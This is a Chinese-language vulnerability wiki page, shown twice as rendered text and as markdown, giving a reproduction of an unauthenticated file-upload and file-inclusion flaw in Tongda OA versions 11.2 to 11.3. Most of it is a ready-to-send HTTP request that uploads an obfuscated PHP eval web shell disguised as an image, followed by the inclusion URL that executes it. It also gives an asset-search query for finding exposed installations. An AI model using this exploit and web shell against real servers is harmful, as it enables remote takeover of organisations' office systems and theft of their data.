fofamini-wiki

登录白背景

源码

通达OA ispirit存在前台文件包含漏洞

一、漏洞简介

通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。ispirit/im/upload.php文件存在可绕过身份验证上传任意文件，通过/ispirit/interface/gateway.php包含上传文件从而导致可以控制服务器getshell。

二、影响版本

通达OA V11.2-通达OA 11.3

三、资产测绘

hunterapp.name="通达 OA"
特征

四、漏洞复现

上传文件

POST /ispirit/im/upload.php HTTP/1.1
Host: {hostname}
Content-Length: 639
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Connection: close

------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="png"
Content-Type: image/jpeg

<?php class GB7W5S8T { public function __construct($H7U41){ @eval("/*Zc98EhVx4t*/".$H7U41."/*Zc98EhVx4t*/"); }}new GB7W5S8T($_REQUEST['x']);?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--

利用文件包含上传文件getshell

/ispirit/interface/gateway.php?json={"url":"/general/../../attach/im/2307/1775389563.png"}

原文: https://www.yuque.com/xiaokp7/ocvun2/xt17927k204x2uyq

# 通达OA ispirit存在前台文件包含漏洞

# 一、漏洞简介
通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。ispirit/im/upload.php文件存在可绕过身份验证上传任意文件，通过/ispirit/interface/gateway.php包含上传文件从而导致可以控制服务器getshell。

# 二、影响版本

- 通达OA V11.2-通达OA 11.3

# 三、资产测绘

- hunter`app.name="通达 OA"`
- 特征

![image.png](./img/GOGwyamx3yNObObQ/1694870829657-63e4515a-b222-49fe-a8a1-54bcc9cc1af3-517254.png)

# 四、漏洞复现
上传文件
```java
POST /ispirit/im/upload.php HTTP/1.1
Host: {hostname}
Content-Length: 639
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Connection: close

------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="png"
Content-Type: image/jpeg

<?php class GB7W5S8T { public function __construct($H7U41){ @eval("/*Zc98EhVx4t*/".$H7U41."/*Zc98EhVx4t*/"); }}new GB7W5S8T($_REQUEST['x']);?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--
```
![image.png](./img/GOGwyamx3yNObObQ/1690811671568-7cc4f38e-da98-48ec-90b1-625d95b42352-480254.png)
利用文件包含上传文件getshell
```java
/ispirit/interface/gateway.php?json={"url":"/general/../../attach/im/2307/1775389563.png"}
```
![image.png](./img/GOGwyamx3yNObObQ/1690811684969-3c11e025-7c54-4ca3-96b6-aacc2aaa51d8-471083.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xt17927k204x2uyq>